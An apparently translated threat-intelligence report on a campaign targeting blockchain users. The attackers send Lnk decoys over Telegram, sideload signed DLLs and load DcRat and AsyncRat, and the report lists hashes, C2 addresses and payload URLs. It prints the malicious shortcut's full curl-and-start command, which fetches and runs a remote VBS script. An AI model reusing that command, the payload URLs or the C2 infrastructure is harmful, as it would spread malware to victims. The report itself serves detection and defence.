返回 TI 主页

Overview

Qi'anxin Threat Intelligence Center and Skyrocket Falcon team found a group of unknown attackers are targeting blockchain customers during terminal operation, the malicious zip file is "transfer screenshot 2025.5.31.zip", the attackers spread it one-to-one through Telagram communication software, in the zip file are Lnk decoy, double-click to pop up the screenshot of the transfer record and release the White Plus Black component, memory loaded DcRat, C2 with a self-signed certificate mimicking qianxin.com.

Currently, ASRock's "Liuhe" advanced threat defense engine can block this Lnk, and we recommend customers to enable cloud checking function to find unknown threats.


Sample Analysis

The Lnk file points to the following commands:

- -
Cmd
C:\Windows\System32\cmd.exe /c "curl -o C:\Users\Public\aa.vbs https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5C25D918A2314DA2AC8D3C704287E278.vbs && start C:\Users\Public\aa.vbs"

Download the vbs script from the remote server and start it, the content is as follows, with Chinese comments, the content is very similar to the mainstream GPT auto-generated script code:

- - -
Download Link File Path Description
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5CF1D461CBF74FC4A2379ACCC8D45CA7.jpg C:\Users\Public\TokenPocket.jpg Bait Picture
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/C16E6F8B5A614F74A597C3F055484754.txt C:\Users\Public\pythonw.exe White file for loading malicious DLLs
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/2C36BCF9295640CFB21933AE822F5D75.res C:\Users\Public\python310.dll Black DLL component with white signature

The decoy file is shown below:

The released black dll is digitally signed with a legitimate signature "Wuhoo Harmonious Reed Trade Co., Ltd."

The malicious code logic is in the Py_Main function, whose main function is to load a Shellcode in memory.

This Shellcode is a Loader which is used to load the final payload DCRat, C2: 103.45.68.150:80

After establishing a connection with C2, start Powershell to download the payload for the second stage:

- - -
Download Link File Path Description
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/27391835C6744B469E35C90327E527C8.txt C:\Users\Public\arphaCrashReport64.exe White file for loading malicious DLLs
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/B999853FC3464384A7E5E5B9B71147E5.res C:\Users\Public\arphadump64.dll Black DLL component
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/540B0BAA3C5641EC9BF220021A16D230.ini C:\Users\Public\arphaCrashReport64.ini Encrypted shellcode
https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/15AD296C703E4D648CA98FED712C6C49.jpg C:\Users\Public\photo_2024-12-07_00-24-16.jpg Bait image

The attacker pops up another decoy image in the second stage to show that the transfer is complete:

The function of the white-on-black component in the second stage is to read arphaCrashReport64.ini, decrypt it into Shellcode, and load it into the newly created process rundll32.exe.

The Shellcode function is the same as before, loading the same payload DCRat, C2: 38.46.13.170:8080


Expanding the Line

Its infrastructure used to build bitcoin selling websites, suspected to be used for fraud.

There are a small number of such sites active, and they seem to be built from the same templates:

Samples of the same origin were observed on VT, suspected to be propagated via SEO.

- -
Md5 Filename
3cf9a8d8b7b68160d7523e60b0e43cd5 letsvpn-latest.exe

Also with a digital signature, currently logged off:

Sandbox recognized as AsyncRat, C2: 148.178.16.22:6666


Summarize

Currently, the full line of products based on the threat intelligence data from the Qi'anxin Threat Intelligence Center, including the Qi'anxin Threat Intelligence Platform (TIP), SkyRock, SkyEye Advanced Threat Detection System, Qi'anxin NGSOC, and Qi'anxin Situational Awareness, already support the accurate detection of such attacks.


IOC

FileHash-MD5:

05339834a0e7317505c74b58b19aaf0e

1b98984d2438d7a5d14b4f373b55603b

3cf9a8d8b7b68160d7523e60b0e43cd5

DcRat C2:

103.45.68.150:80|443

103.45.68.244:80|443

103.45.68.203:80|443

38.46.13.170:8080

AsyncRat C2:

148.178.16.22:6666

zl-web-images.oss-cn-shenzhen.aliyuncs.com

BLOCKCHAIN MALWARE